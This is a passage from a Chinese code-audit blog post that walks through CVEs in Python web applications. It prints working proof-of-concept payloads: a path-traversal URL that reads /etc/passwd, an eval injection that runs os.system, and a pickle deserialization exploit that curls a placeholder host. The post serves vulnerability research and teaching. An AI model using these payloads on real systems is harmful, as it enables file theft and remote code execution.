&quot;LOGIN_IN_TO&quot;)</span><br><span class="line">        return data</span><br></pre></td></tr></table></figure>

<p>然后在前端js中<code>apps\admin_pages\pages\sign-in.html</code></p>
<p>直接获取响应的data的to_url进行跳转，类似于统一登陆中的任意域跳转的问题。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">var result = osrHttp(&quot;PUT&quot;,&quot;/api/sign-in&quot;, d);</span><br><span class="line">      result.then(function (r) &#123;</span><br><span class="line">             if(r.data.msg_type==&quot;s&quot;)&#123;</span><br><span class="line">                 window.location.href = r.data/to_url;</span><br><span class="line"></span><br><span class="line">             &#125;else if(r.data.open_img_verif_code)&#123;</span><br><span class="line">                 get_imgcode();</span><br><span class="line">             &#125;</span><br><span class="line">      &#125;).catch(function (r) &#123;</span><br><span class="line">         if(r.data.open_img_verif_code)&#123;</span><br><span class="line">             get_imgcode();</span><br><span class="line">         &#125;</span><br><span class="line">      &#125;);</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2020-28739"><a href="#CVE-2020-28739" class="headerlink" title="CVE-2020-28739"></a>CVE-2020-28739</h3><p><code>apps\modules\theme_setting\process\static_file.py</code></p>
<p>读取静态文件模板的时候，直接使用了请求的参数进行拼接访问，导致可以任意读取文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">def get_static_file_content():</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    获取静态文件内容, 如html文件</span><br><span class="line">    :return:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    filename = request.argget.all(&#x27;filename&#x27;, &quot;index&quot;).strip(&quot;/&quot;)</span><br><span class="line">    file_path = request.argget.all(&#x27;file_path&#x27;, &quot;&quot;).strip(&quot;/&quot;)</span><br><span class="line">    theme_name = request.argget.all(&quot;theme_name&quot;)</span><br><span class="line"></span><br><span class="line">    s, r = arg_verify([(gettext(&quot;theme name&quot;), theme_name)], required=True)</span><br><span class="line">    if not s:</span><br><span class="line">        return r</span><br><span class="line">    path = os.path.join(</span><br><span class="line">        THEME_TEMPLATE_FOLDER, theme_name)</span><br><span class="line">    file = &quot;&#123;&#125;/&#123;&#125;/&#123;&#125;&quot;.format(path, file_path, filename)</span><br><span class="line">    if not os.path.exists(file) or THEME_TEMPLATE_FOLDER not in file:</span><br><span class="line">        data = &#123;&quot;msg&quot;: gettext(&quot;File not found,&#x27;&#123;&#125;&#x27;&quot;).format(file),</span><br><span class="line">                &quot;msg_type&quot;: &quot;w&quot;, &quot;custom_status&quot;: 404&#125;</span><br><span class="line">    else:</span><br><span class="line">        with open(file) as wf:</span><br><span class="line">            content = wf.read()</span><br><span class="line">        data = &#123;</span><br><span class="line">            &quot;content&quot;: content,</span><br><span class="line">            &quot;file_relative_path&quot;: file_path.replace(</span><br><span class="line">                path,</span><br><span class="line">                &quot;&quot;).strip(&quot;/&quot;)&#125;</span><br><span class="line">    return data</span><br></pre></td></tr></table></figure>

<p>构造POC：<code>http://192.168.120.128:5000/api/admin/static/file?file_path=pages/account/settings/../../../../../../../../etc&amp;filename=passwd&amp;theme_name=osr-theme-w</code></p>
<p><img src="/images/image-20201112174207578.png" alt="image-20201112174207578"></p>
<h3 id="CVE-2020-28740"><a href="#CVE-2020-28740" class="headerlink" title="CVE-2020-28740"></a>CVE-2020-28740</h3><p>rce</p>
<p><code>apps\utils\format\obj_format.py</code></p>
<p>如下，文件中采用了eval来转换字符串对象，当json.loads转换失败的时候，则直接使用eval来转换。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">def json_to_pyseq(tjson):</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    json to python sequencer</span><br><span class="line">    :param json:</span><br><span class="line">    :return:</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    if tjson in [None, &quot;None&quot;]:</span><br><span class="line">        return None</span><br><span class="line">    elif not isinstance(tjson, (list, dict, tuple)) and tjson != &quot;&quot;:</span><br><span class="line">        if isinstance(tjson, (str, bytes)) and tjson[0] not in [&quot;&#123;&quot;, &quot;[&quot;, &quot;(&quot;]:</span><br><span class="line">            return tjson</span><br><span class="line">        elif isinstance(tjson, (int, float)):</span><br><span class="line">            return tjson</span><br><span class="line">        try:</span><br><span class="line">            tjson = json.loads(tjson)</span><br><span class="line">        except BaseException:</span><br><span class="line">            tjson = eval(tjson)</span><br><span class="line">        else:</span><br><span class="line">            if isinstance(tjson, str):</span><br><span class="line">                tjson = eval(tjson)</span><br><span class="line">    return tjson</span><br></pre></td></tr></table></figure>

<p>转到一个使用此方法的功能，例如<code>apps\modules\audit\process\rules.py</code></p>
<p>删除规则处，传入一个ids参数，原参数值是一个hash值，但是可以修改为python代码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">def audit_rule_delete():</span><br><span class="line"></span><br><span class="line">    ids = json_to_pyseq(request.argget.all(&#x27;ids&#x27;, []))</span><br><span class="line">    if not isinstance(ids, list):</span><br><span class="line">        ids = json.loads(ids)</span><br><span class="line">    for i, tid in enumerate(ids):</span><br><span class="line">        ids[i] = ObjectId(tid)</span><br><span class="line"></span><br><span class="line">    r = mdbs[&quot;sys&quot;].db.audit_rules.delete_many(&#123;&quot;_id&quot;: &#123;&quot;$in&quot;: ids&#125;&#125;)</span><br><span class="line">    if r.deleted_count &gt; 0:</span><br><span class="line">        data = &#123;&quot;msg&quot;: gettext(&quot;Delete the success,&#123;&#125;&quot;).format(</span><br><span class="line">            r.deleted_count), &quot;msg_type&quot;: &quot;s&quot;, &quot;custom_status&quot;: 204&#125;</span><br><span class="line">    else:</span><br><span class="line">        data = &#123;</span><br><span class="line">            &quot;msg&quot;: gettext(&quot;Delete failed&quot;),</span><br><span class="line">            &quot;msg_type&quot;: &quot;w&quot;,</span><br><span class="line">            &quot;custom_status&quot;: 400&#125;</span><br><span class="line">    return data</span><br></pre></td></tr></table></figure>

<p>参数POC：<code> {123:__import__(&#39;os&#39;).system(&#39;whoami&#39;)}</code>，查看终端输出。</p>
<p><img src="/images/image-20201112124711645.png" alt="image-20201112124711645"></p>
<p><img src="/images/image-20201112121033287.png" alt="image-20201112121033287"></p>
<p>只要涉及到ids参数的都存在此问题，比如另一个类别删除功能。</p>
<p><img src="/images/image-20201112133809406.png" alt="image-20201112133809406"></p>
<p>在用户登陆的判断中，也对传入的参数<code>code_url_obj</code>执行了此方法，所以存在一个前台的RCE</p>
<p><code>apps\modules\user\process\online.py</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code_url_obj = json_to_pyseq(request.argget.all(&#x27;code_url_obj&#x27;, &#123;&#125;))</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20201112162057637.png" alt="image-20201112162057637"></p>
<h3 id="CVE-2020-25406"><a href="#CVE-2020-25406" class="headerlink" title="CVE-2020-25406"></a>CVE-2020-25406</h3><p>lemocms-php 文件上传</p>
<h3 id="CVE-2020-14942"><a href="#CVE-2020-14942" class="headerlink" title="CVE-2020-14942"></a>CVE-2020-14942</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">ticket_list</span>(<span class="params">request</span>):</span><br><span class="line">    context = &#123;&#125;</span><br><span class="line">    ......</span><br><span class="line">    <span class="keyword">if</span> request.GET.get(<span class="string">&#x27;saved_query&#x27;</span>, <span class="literal">None</span>):</span><br><span class="line">            from_saved_query = <span class="literal">True</span></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                saved_query = SavedSearch.objects.get(pk=request.GET.get(<span class="string">&#x27;saved_query&#x27;</span>))</span><br><span class="line">            <span class="keyword">except</span> SavedSearch.DoesNotExist:</span><br><span class="line">                <span class="keyword">return</span> HttpResponseRedirect(reverse(<span class="string">&#x27;helpdesk_list&#x27;</span>))</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> (saved_query.shared <span class="keyword">or</span> saved_query.user == request.user):</span><br><span class="line">                <span class="keyword">return</span> HttpResponseRedirect(reverse(<span class="string">&#x27;helpdesk_list&#x27;</span>))</span><br><span class="line"></span><br><span class="line">            <span class="keyword">import</span> pickle</span><br><span class="line">            <span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode</span><br><span class="line">            query_params = pickle.loads(b64decode(<span class="built_in">str</span>(saved_query.query).encode()))</span><br><span class="line">        <span class="keyword">elif</span> <span class="keyword">not</span> (  <span class="string">&#x27;queue&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                <span class="keyword">or</span>  <span class="string">&#x27;assigned_to&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                <span class="keyword">or</span>  <span class="string">&#x27;status&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                <span class="keyword">or</span>  <span class="string">&#x27;q&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                <span class="keyword">or</span>  <span class="string">&#x27;sort&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                <span class="keyword">or</span>  <span class="string">&#x27;sortreverse&#x27;</span> <span class="keyword">in</span> request.GET</span><br><span class="line">                    ):</span><br></pre></td></tr></table></figure>

<p>从上面代码看出，这是一个从views中获取参数<code>saved_query</code>，通过id判断请求的用户和数据所属用户身份，正确后反序列化其中的query值，那么这个数据库是如下，保存的是一个文本字段。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SavedSearch</span>(models.Model):</span><br><span class="line">	......</span><br><span class="line">	query = models.TextField(</span><br><span class="line">        _(<span class="string">&#x27;Search Query&#x27;</span>),</span><br><span class="line">        help_text=_(<span class="string">&#x27;Pickled query object. Be wary changing this.&#x27;</span>),</span><br><span class="line">        )</span><br></pre></td></tr></table></figure>

<p>如何去处理这个字段的值，在上个文件中，找到保存的处理方法。从post中获取<code>query_encoded</code>，判断不为空则直接保存进数据库。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">save_query</span>(<span class="params">request</span>):</span><br><span class="line">    title = request.POST.get(<span class="string">&#x27;title&#x27;</span>, <span class="literal">None</span>)</span><br><span class="line">    shared = request.POST.get(<span class="string">&#x27;shared&#x27;</span>, <span class="literal">False</span>) <span class="keyword">in</span> [<span class="string">&#x27;on&#x27;</span>, <span class="string">&#x27;True&#x27;</span>, <span class="literal">True</span>, <span class="string">&#x27;TRUE&#x27;</span>]</span><br><span class="line">    query_encoded = request.POST.get(<span class="string">&#x27;query_encoded&#x27;</span>, <span class="literal">None</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> title <span class="keyword">or</span> <span class="keyword">not</span> query_encoded:</span><br><span class="line">        <span class="keyword">return</span> HttpResponseRedirect(reverse(<span class="string">&#x27;helpdesk_list&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    query = SavedSearch(title=title, shared=shared, query=query_encoded, user=request.user)</span><br><span class="line">    query.save()</span><br></pre></td></tr></table></figure>

<p>那么如何调用的，同样去搜索关键词<code>save_query</code>找到路由，找到对应的name为<code>helpdesk_savequery</code>，找到对应的前端表单</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=&#x27;post&#x27; action=&#x27;&#123;% url &#x27;helpdesk_savequery&#x27; %&#125;&#x27;&gt;</span><br><span class="line">    &lt;input type=&#x27;hidden&#x27; name=&#x27;query_encoded&#x27; value=&#x27;&#123;&#123; urlsafe_query &#125;&#125;&#x27; /&gt;</span><br><span class="line">    &lt;dl&gt;</span><br><span class="line">        &lt;dt&gt;&lt;label for=&#x27;id_title&#x27;&gt;&#123;% trans &quot;Query Name&quot; %&#125;&lt;/label&gt;&lt;/dt&gt;</span><br><span class="line">        &lt;dd&gt;&lt;input type=&#x27;text&#x27; name=&#x27;title&#x27; id=&#x27;id_title&#x27; /&gt;&lt;/dd&gt;</span><br><span class="line">        &lt;dd class=&#x27;form_help_text&#x27;&gt;&#123;% trans &quot;This name appears in the drop-down list of saved queries. If you share your query, other users will see this name, so choose something clear and descriptive!&quot; %&#125;&lt;/dd&gt;</span><br><span class="line"></span><br><span class="line">        &lt;dt&gt;&lt;label for=&#x27;id_shared&#x27;&gt;&#123;% trans &quot;Shared?&quot; %&#125;&lt;/label&gt;&lt;/dt&gt;</span><br><span class="line">        &lt;dd&gt;&lt;input type=&#x27;checkbox&#x27; name=&#x27;shared&#x27; id=&#x27;id_shared&#x27; /&gt; &#123;% trans &quot;Yes, share this query with other users.&quot; %&#125;&lt;/dd&gt;</span><br><span class="line">        &lt;dd class=&#x27;form_help_text&#x27;&gt;&#123;% trans &quot;If you share this query, it will be visible by &lt;em&gt;all&lt;/em&gt; other logged-in users.&quot; %&#125;&lt;/dd&gt;</span><br><span class="line"></span><br><span class="line">    &lt;/dl&gt;</span><br><span class="line"></span><br><span class="line">    &lt;div class=&#x27;buttons&#x27;&gt;</span><br><span class="line">        &lt;input class=&quot;btn btn-primary&quot; type=&#x27;submit&#x27; value=&#x27;&#123;% trans &quot;Save Query&quot; %&#125;&#x27;&gt;</span><br><span class="line">    &lt;/div&gt;</span><br><span class="line"></span><br><span class="line">    &#123;% csrf_token %&#125;&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<p>从表单中可以看到，<code>query_encoded</code>是模板写入，找到<code>urlsafe_query</code>看是如何调用的，从调用结果看，就知道是后台先去序列化然后赋值给模板，前端模板操作的时候，再把这个序列化的值传入后台中去反序列化。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">......</span><br><span class="line">    <span class="keyword">import</span> pickle</span><br><span class="line">    <span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode</span><br><span class="line">    urlsafe_query = b64encode(pickle.dumps(query_params)).decode()</span><br></pre></td></tr></table></figure>

<p>尝试构造一个反序列化的poc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle,os</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">exp</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (os.system,(<span class="string">&#x27;curl http://xxxx/py&#x27;</span>,))</span><br><span class="line">e = exp()</span><br><span class="line">b64encode(pickle.dumps(e))</span><br></pre></td></tr></table></figure>

<h3 id="CVE-2020-24957"><a href="#CVE-2020-24957" class="headerlink" title="CVE-2020-24957"></a>CVE-2020-24957</h3><p>115cms-php-csrf</p>
<h3 id="CVE-2020-24958"><a href="#CVE-2020-24958" class="headerlink" title="CVE-2020-24958"></a>CVE-2020-24958</h3><p>115cms-php-xss</p>
<h3 id="CVE-2020-24959"><a href="#CVE-2020-24959" class="headerlink" title="CVE-2020-24959"></a>CVE-2020-24959</h3><p>115cms-php-sqli</p>
<h3 id="CVE-2020-24960"><a href="#CVE-2020-24960" class="headerlink" title="CVE-2020-24960"></a>CVE-2020-24960</h3><p>115cms-php-sqli</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li>
        
          <li><a href="/links/">Links</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28735"><span class="toc-number">1.</span> <span class="toc-text">CVE-2020-28735</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28736"><span class="toc-number">2.</span> <span class="toc-text">CVE-2020-28736</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28734"><span class="toc-number">3.</span> <span class="toc-text">CVE-2020-28734</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28737"><span class="toc-number">4.</span> <span class="toc-text">CVE-2020-28737</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28738"><span class="toc-number">5.</span> <span class="toc-text">CVE-2020-28738</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28739"><span class="toc-number">6.</span> <span class="toc-text">CVE-2020-28739</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-28740"><span class="toc-number">7.</span> <span class="toc-text">CVE-2020-28740</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-25406"><span class="toc-number">8.</span> <span class="toc-text">CVE-2020-25406</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-14942"><span class="toc-number">9.</span> <span class="toc-text">CVE-2020-14942</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24957"><span class="toc-number">10.</span> <span class="toc-text">CVE-2020-24957</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24958"><span class="toc-number">11.</span> <span class="toc-text">CVE-2020-24958</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24959"><span class="toc-number">12.</span> <span class="toc-text">CVE-2020-24959</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2020-24960"><span class="toc-number">13.</span> <span class="toc-text">CVE-2020-24960</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&text=CodeAudit-Case-Python"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&is_video=false&description=CodeAudit-Case-Python"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CodeAudit-Case-Python&body=Check out this article: https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&title=CodeAudit-Case-Python"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&name=CodeAudit-Case-Python&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://w3nq14.github.io/2026/03/27/CodeAudit/CodeAudit-Case-Python/&t=CodeAudit-Case-Python"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
